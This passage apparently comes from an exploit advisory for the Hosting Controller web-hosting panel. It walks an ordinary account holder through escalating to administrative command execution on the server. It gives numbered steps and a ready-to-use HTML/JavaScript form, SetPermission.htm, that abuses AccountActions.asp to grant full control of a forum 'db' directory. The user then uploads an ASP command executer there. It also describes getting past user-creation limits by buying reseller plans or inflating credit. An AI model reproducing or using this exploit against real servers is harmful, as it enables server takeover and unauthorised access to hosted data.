2- [User] can copy a file to hosting controller web directory which is executed under administrative privilege, so attacker can execute his commands by administrative privilege. For example attacker can gain remote desktop of server by this way and uploading an ASP file!
This bug is because of "inc_newuser.asp" that can set full control permission on each "db","www","Special", or "log" directory on the server.
This part is more complicated than the others, so we describe it more too.
    2.1- We have a username, for ex. “testuser” for a site like “testuser.com” 
    2.2- Login by "testuser" and its password.
 2.3- Find Hosting Controller setup directory as we wrote it in part 11. (default directory is “C:\Program Files\Advanced Communications\Hosting Controller\web\admin\”)
    2.4- Find “testuser.com” IIS username by uploading a file or by seeing all system user (part 10) or by your experience (username for “testuser.com” is always like “testusercom_web” )
    2.5- Drag & drop "SetPermission.htm" to your current browser's window (that is logged in Hosting Controller) and fill it.
        ~~~~~~~~~~~~~~~~2.5.1 SetPermission.htm~~~~~~~~~~~~~~~~~~~~~~~~
            <pre>
            This file set full permission on "DB" directory of "forum"
            So you can upload your file there and execute your command with administrator permission.
            </pre>
            <script language="javascript">
            function check(){
                _action = '/accounts/AccountActions.asp?ActionType=AddUser'
                _forumdir = '\\forum|1'
                frmPermission.action = frmPermission.URL.value + _action
                frmPermission.Dirroot.value = frmPermission.hcpath.value + _forumdir
                if(frmPermission.NewName.value.length>20){
                    alert('Enter a username less than 20 char like ASPNET');
                    frmPermission.NewName.focus();
                    return false;
                }else return true;
            }
            </script>
            <form name="frmPermission" action="" method="post" onsubmit="return check()">
            Site URL: <input type="text" name="URL" size="30"> <font size="2">like: http://tesuser.com:8077 or http://testuser.com/admin</font><br>
            Username (less than 20): <input type="text" name="NewName" size="30"> <font size="2">like: ASPNET or testusercom_web </font><br>
            HC Files Path (no back-slash at end): <input type="text" name="hcpath" size="30"> <font size="2">like: C:\Program Files\Advanced Communications\Hosting Controller\web\admin</font><br>
            
            <br>
            <input type="hidden" name="Dirroot">
            <input type="hidden" value="db" name="anything1">
            
            <br>
            <input type="submit" value="Go!">
            <input type="reset" value="Reset">
            </form>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    2.6- If you see “Error: 70500170 : User already exists in either OS or Database.“ Means that all the thing are OK!, and your permission has already set.
    2.7- Now you have a full access to "[HCPATH]\Forum\DB". 
     Note: You can do that with "[HCPATH]\phpBB\phpBB\db" too because there is "db" directory too.
   2.8- So you can upload your command executer there, but you need a file uploader at first on "testuser.com" to upload your command executer on "[HCPATH]\Forum\DB".
 2.9- If your permission has not been set correctly, its always because of limitation on making a new user. So you must login with username's reseller and make a new plan with making some new user accounts permission then sell it to your username. Also, you can increase your credit amount (part 6) and buy a plan with a lot of web accounts then select it and do these operation from the first. (Note: This vulnerability works properly and there is no exception like the others!)